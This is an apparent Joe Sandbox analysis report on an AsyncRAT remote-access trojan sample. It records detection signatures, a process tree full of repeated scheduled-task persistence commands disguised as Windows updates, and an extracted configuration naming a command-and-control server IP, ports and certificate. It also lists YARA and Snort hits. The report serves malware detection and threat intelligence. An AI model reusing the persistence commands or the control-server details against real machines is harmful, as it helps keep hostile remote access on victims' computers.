Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EGSh5caf8a.exe

Overview

General Information

Sample name:EGSh5caf8a.exe
renamed because original name is a hash value
Original sample name:712940BAEF78C821E36B8701BF073C52.exe
Analysis ID:1428675
MD5:712940baef78c821e36b8701bf073c52
SHA1:d59896b87424fafc0d00ab5e5c2019bd941167ce
SHA256:08f8498aec75418bb4c12972a6547ee2c4762160e7bf36c558a91b7b9110ed3f
Tags:AsyncRATexeRAT
Infos:

Detection

AsyncRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:46
Range:0 - 100

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected AsyncRAT
.NET source code contains potential unpacker
Allocates memory in foreign processes
Connects to many ports of the same IP (likely port scanning)
Injects a PE file into a foreign processes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • EGSh5caf8a.exe (PID: 180 cmdline: "C:\Users\user\Desktop\EGSh5caf8a.exe" MD5: 712940BAEF78C821E36B8701BF073C52)
    • schtasks.exe (PID: 4816 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6748 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6608 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:39 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 4692 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:40 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5856 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:41 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2412 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:42 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2256 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:43 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2924 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:43 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5172 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:44 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6672 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:45 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6452 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:46 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5648 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:47 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 3300 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:48 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6192 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:48 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 3960 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:49 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5868 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:50 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6220 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:51 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6616 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:52 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 4252 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:53 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 3092 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:53 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5464 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:54 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5468 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:55 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2856 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:56 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5736 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:57 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7268 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:01 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7352 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:07 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7420 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:13 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7476 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:17 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7524 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:21 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7572 cmdline: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:25 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Malware Configuration

Threatname: AsyncRAT

{"Ports": ["6606", "7707", "8808"], "Server": ["204.12.199.30"], "Mutex": "Bbtt03i3Zbxo", "Certificate": "MIIE8jCCAtqgAwIBAgIQAOd8JAii5M5++OnIagLrMTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjQwMjI2MDg0MzU2WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIOYWpZtR4+pV6eLVgmoW0pmFYYGm9MA+E38jZKadM0mAmNmtr24EWva8gLkn0jY887Tz5347cDo2BpaCAsnAktrEy5d5Bpc1aeAqIb0YCxwMJQGMkE0qwGViGunPUyPzzk6qoqQw/BZPNrQh13JLBN/++Xg5rspfo6GrmqAYpcyoh+nmtbBt/wfQsjrDmZ3TBNCniJX4Ax2lfymDtG/oOlmwo0YXGL/rszP7UxRo0V29mFPG5kEm+346UEZRNeIzf1FV/30VxvyZO8v/PBzVZOyav8MFGZSdo/7y8cdzIWwd+LcUAmZtSxFigD6YRLLwry7klVR0MpzqXqm9V7Cyqlbe04xIV1/UjhdSIDmGqnA8AMp+pwJRZRI3RMhE7HTbjzLULjBoUUTkcMLlIAPmflnfyyyHwxOr9SrHGfyecgDHH0q3/LMgH30jejoUvT2WyQYi5O6PdzX4ifLrQO7JJ6QNd6sihnR0U/IjQRaM0TJay0tQd/R3nHkzNjoBFCu/yBUGVVvFJabfpP14a5PCgQI1qG2JKXd49hK0v0B65ZjDY4vwan+qlP9n+KWeeK6jIg1qnkScg/88vUZKBv8mP6s2cbq+TFHgBoxrxVxIiM3N81tWZC7e6BRBcqORtpngao2N+16NLMsjMCjpY0hTeyQOJP9toGnmyY6Moxs0ciTAgMBAAGjMjAwMB0GA1UdDgQWBBRJpCHBn9DcES+YzHzK1/1Xt6WvWzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQAow/Tq1W/Y/rkz41iTb/g5jrpI0VYmar2AH0Gcud9JaLtJ6hs4klWzG/C36xI4ModlwDQqGWTqkhG17pAFwOZV7OPmMqGEXANvDfjrQqu2Zm5YLaMLVVTQNuHKQPAq+n0ILbDre+Rq1oVxxhRCv1Yz/toSe3W3vRefl2GpoPGgwd5xtUnOytoaeFjOyYtXRMDzwbP9bUeSliHCnsBHkhTulMTjKBgJm7cvRw3FqTQAO95qzwIA4eQORnCynTZTM8sLYD597unFJehoZ8MRwEvnhq0od7nUn/JsDVna5mwRbJ413n/XtU7dIZkYvy0gQB0SMS8JPl0T4scz4Xbr0GSoj0YdRQmzlRXcTq9QQVqbE5X3j7voyrfY+fXLdthqeOObS0dALsAkrf6ILiAjr8wCVhW1URzlLBROgRs9swEoilJSdYxbHR9WvI2qw3LekrnZuLzBe8JUUcbDldrZFSUTuPiJYrDLCOQNZRG2uudymPvRqjnNDi9+3g3kzkB4AM7a2qSw+jZW6eXYGUFPeXjBanXsI0MJyNy9APnm3xi95iRqsR8iIqnKWzBqGF1E7LlsfZSn/fs9zZLgZH1CXFtpYxkWItnJdvOWA8q8RlrIZbf9Y7r5vIVwTR5pa+kGhW7Dvn24gaTp22GMRPSVXs1Ye4ztEm8MJbNNja3bUvx64A==", "Server Signature": "OHKZ7NWYl69EYIQcyC6+PGfU36n99thKqZdxN0puh4L1ETCwoOa29nJb96GrK7QKRepJZnvN+MRxczJy/Px1REeunjNO5Y//T/IyjBXZND5C8On0ON2cjRX83tRDp+Ioric9U5TtKN1Jq7L+GIGKanzfukOxSsg4f36h5IIQisCt8l9W8moK6s3BQDkx1NihC7WXyvRxf6UQsOdvhtD6fdi7h8NNBmEf0BwHbT74dNrA/9Te1MtfU1ddPlN6XT4EfFLKmKTpUGlegoneAsMRCPfpQbzmrfWmjXVMvUUg4E4HAWabE5U90mYvb+p9AcTVB+LCTlhs7KD3VtBDoKygN8IJcliOtp5FjfLKAIU6VAOi41SXMIFzGB11kVgd5fvhbJJgN7g3ZGQjesaSlXCmvzTnfyF2vPqvSnqc9KmTtZ2Cun1v4IztyqIlbYhEsSk5aa/MoOYLcVkgndI15PBP9WrrBwZqn3lgI86MOCtPPIilyL0pJLOGHvwRH7pC4AbJzmlvCyq0Foua4LyJGkDoQJsBuoPQF6I8XOlaNx4C0G+2mFZMloUlBPr/BdOawIaAU2SJldYrrCYHElg8YCpncvCfyJoo3GNuX22OdjgIaqORlg0+zv+1xcoKQIlIpcQi/puqHlRAZjEy5ZZC9GOG9dgAPYQopJKO8p/zMoDsP0g="}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0x49803:$x1: AsyncRAT
  • 0x49841:$x1: AsyncRAT

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Asyncrat_11a11ba1unknownunknown
    • 0xa36b:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
    • 0xb698:$a2: Stub.exe
    • 0xb728:$a2: Stub.exe
    • 0x7147:$a3: get_ActivatePong
    • 0xa583:$a4: vmware
    • 0xa3fb:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
    • 0x7ea2:$a6: get_SslClient
    00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
    • 0xa3fd:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
    00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Asyncrat_11a11ba1unknownunknown
      • 0xbb23:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
      • 0xce38:$a2: Stub.exe
      • 0xcec8:$a2: Stub.exe
      • 0x88ff:$a3: get_ActivatePong
      • 0xbd3b:$a4: vmware
      • 0xbbb3:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
      • 0x965a:$a6: get_SslClient
      Click to see the 4 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.EGSh5caf8a.exe.28dc200.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        0.2.EGSh5caf8a.exe.28dc200.0.unpackWindows_Trojan_Asyncrat_11a11ba1unknownunknown
        • 0x7b23:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
        • 0x8e38:$a2: Stub.exe
        • 0x8ec8:$a2: Stub.exe
        • 0x48ff:$a3: get_ActivatePong
        • 0x7d3b:$a4: vmware
        • 0x7bb3:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
        • 0x565a:$a6: get_SslClient
        0.2.EGSh5caf8a.exe.28dc200.0.unpackINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
        • 0x7bb5:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
        0.2.EGSh5caf8a.exe.28dc200.0.raw.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          0.2.EGSh5caf8a.exe.28dc200.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            Click to see the 2 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST, CommandLine: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\EGSh5caf8a.exe", ParentImage: C:\Users\user\Desktop\EGSh5caf8a.exe, ParentProcessId: 180, ParentProcessName: EGSh5caf8a.exe, ProcessCommandLine: "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST, ProcessId: 4816, ProcessName: schtasks.exe

            Snort Signatures

            Timestamp:04/19/24-11:37:15.963600
            SID:2030673
            Source Port:8808
            Destination Port:49710
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/19/24-11:37:15.963600
            SID:2035595
            Source Port:8808
            Destination Port:49710
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Ports": ["6606", "7707", "8808"], "Server": ["204.12.199.30"], "Mutex": "Bbtt03i3Zbxo", "Certificate": "MIIE8jCCAtqgAwIBAgIQAOd8JAii5M5++OnIagLrMTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjQwMjI2MDg0MzU2WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIOYWpZtR4+pV6eLVgmoW0pmFYYGm9MA+E38jZKadM0mAmNmtr24EWva8gLkn0jY887Tz5347cDo2BpaCAsnAktrEy5d5Bpc1aeAqIb0YCxwMJQGMkE0qwGViGunPUyPzzk6qoqQw/BZPNrQh13JLBN/++Xg5rspfo6GrmqAYpcyoh+nmtbBt/wfQsjrDmZ3TBNCniJX4Ax2lfymDtG/oOlmwo0YXGL/rszP7UxRo0V29mFPG5kEm+346UEZRNeIzf1FV/30VxvyZO8v/PBzVZOyav8MFGZSdo/7y8cdzIWwd+LcUAmZtSxFigD6YRLLwry7klVR0MpzqXqm9V7Cyqlbe04xIV1/UjhdSIDmGqnA8AMp+pwJRZRI3RMhE7HTbjzLULjBoUUTkcMLlIAPmflnfyyyHwxOr9SrHGfyecgDHH0q3/LMgH30jejoUvT2WyQYi5O6PdzX4ifLrQO7JJ6QNd6sihnR0U/IjQRaM0TJay0tQd/R3nHkzNjoBFCu/yBUGVVvFJabfpP14a5PCgQI1qG2JKXd49hK0v0B65ZjDY4vwan+qlP9n+KWeeK6jIg1qnkScg/88vUZKBv8mP6s2cbq+TFHgBoxrxVxIiM3N81tWZC7e6BRBcqORtpngao2N+16NLMsjMCjpY0hTeyQOJP9toGnmyY6Moxs0ciTAgMBAAGjMjAwMB0GA1UdDgQWBBRJpCHBn9DcES+YzHzK1/1Xt6WvWzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQAow/Tq1W/Y/rkz41iTb/g5jrpI0VYmar2AH0Gcud9JaLtJ6hs4klWzG/C36xI4ModlwDQqGWTqkhG17pAFwOZV7OPmMqGEXANvDfjrQqu2Zm5YLaMLVVTQNuHKQPAq+n0ILbDre+Rq1oVxxhRCv1Yz/toSe3W3vRefl2GpoPGgwd5xtUnOytoaeFjOyYtXRMDzwbP9bUeSliHCnsBHkhTulMTjKBgJm7cvRw3FqTQAO95qzwIA4eQORnCynTZTM8sLYD597unFJehoZ8MRwEvnhq0od7nUn/JsDVna5mwRbJ413n/XtU7dIZkYvy0gQB0SMS8JPl0T4scz4Xbr0GSoj0YdRQmzlRXcTq9QQVqbE5X3j7voyrfY+fXLdthqeOObS0dALsAkrf6ILiAjr8wCVhW1URzlLBROgRs